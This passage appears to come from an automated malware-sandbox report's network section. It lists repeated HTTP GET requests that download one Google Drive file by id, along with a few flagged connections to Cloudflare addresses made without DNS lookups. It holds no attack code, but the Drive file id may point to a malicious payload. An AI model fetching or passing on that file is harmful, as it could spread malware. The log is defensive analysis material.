Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1

Source: global traffic	DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
